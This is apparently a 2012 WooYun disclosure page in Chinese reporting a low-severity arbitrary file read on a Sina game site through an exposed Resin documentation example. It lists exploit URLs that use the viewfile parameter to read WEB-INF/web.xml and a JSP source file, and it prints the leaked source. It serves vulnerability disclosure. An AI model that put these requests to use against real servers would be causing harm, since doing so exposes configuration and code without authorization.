当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-013565

漏洞标题:新浪某站任意文件读取

相关厂商:新浪

漏洞作者: upload

提交时间:2012-10-19 12:36

修复时间:2012-12-03 12:36

公开时间:2012-12-03 12:36

漏洞类型:任意文件遍历/下载

危害等级:低

自评Rank:5

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-10-19: 细节已通知厂商并且等待厂商处理中
2012-10-19: 厂商已经确认,细节仅向厂商公开
2012-10-29: 细节向核心白帽子及相关领域专家公开
2012-11-08: 细节向普通白帽子公开
2012-11-18: 细节向实习白帽子公开
2012-12-03: 细节向公众公开

简要描述:

配置问题,可看源码

详细说明:

1.Resin

http://xbol.game.sina.cn/


2.读取配置文件

http://xbol.game.sina.cn//resin-doc/examples/ioc-periodictask/viewfile?file=WEB-INF/web.xml


3.源码

http://xbol.game.sina.cn//resin-doc/examples/ioc-periodictask/viewfile?file=admin/mbean.jsp

漏洞证明:

http://xbol.game.sina.cn//resin-doc/examples/ioc-periodictask/viewfile?file=admin/mbean.jsp


<html>
<head>
<title>admin/mbean.jsp</title>
<style type='text/css'>
.code-highlight { color: #1764FF; }
.face-xmlelement { color: #003DB8; font-weight: bold }
</style>
</head>
<body bgcolor=white>
<b>admin/mbean.jsp</b><p>
<pre>&lt;%@ page session="false" import="javax.management.* com.caucho.jmx.Jmx java.util.*" %&gt;
&lt;%@ taglib uri="http://java.sun.com/jsp/jstl/core" prefix="c" %&gt;
&lt;%
// stop browser from caching the page
response.setHeader("Cache-Control","no-cache,post-check=0,pre-check=0,no-store");
response.setHeader("Pragma","no-cache");
response.setHeader("Expires","Thu,01Dec199416:00:00GMT");
// refresh every 5 seconds
response.setHeader("refresh","5");
// prepare objects
ObjectName query = new ObjectName("resin:type=PeriodicTask,*");
pageContext.setAttribute("mbeans",Jmx.query(query));
%&gt;
&lt;html&gt;
&lt;head&gt;&lt;title&gt;mbean&lt;/title&gt;&lt;/head&gt;
&lt;body&gt;
&lt;h1&gt;mbean&lt;/h1&gt;
This page is automatically refreshed every 5 seconds.
&lt;c:forEach var="mbean" items="${mbeans}"&gt;
&lt;hr/&gt;
&lt;dl&gt;
&lt;dt&gt;estimatedAverageTime
&lt;dd&gt;${mbean.estimatedAverageTime}
&lt;dt&gt;active
&lt;dd&gt;${mbean.active}
&lt;dt&gt;estimatedTimeRemaining
&lt;dd&gt;${mbean.estimatedTimeRemaining}
&lt;dt&gt;lastActiveTime
&lt;dd&gt;${mbean.lastActiveTime}
&lt;dt&gt;totalActiveCount
&lt;dd&gt;${mbean.totalActiveCount}
&lt;dt&gt;totalActiveTime
&lt;dd&gt;${mbean.totalActiveTime}
&lt;dt&gt;averageActiveTime
&lt;dd&gt;${mbean.averageActiveTime}
&lt;/dl&gt;
&lt;/c:forEach&gt;
&lt;hr/&gt;
&lt;/body&gt;
&lt;/html&gt;
</pre>
</body>
</html>

修复方案:

....

版权声明:转载请注明来源 upload@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:1

确认时间:2012-10-19 14:22

厂商回复:

多谢。

最新状态:

暂无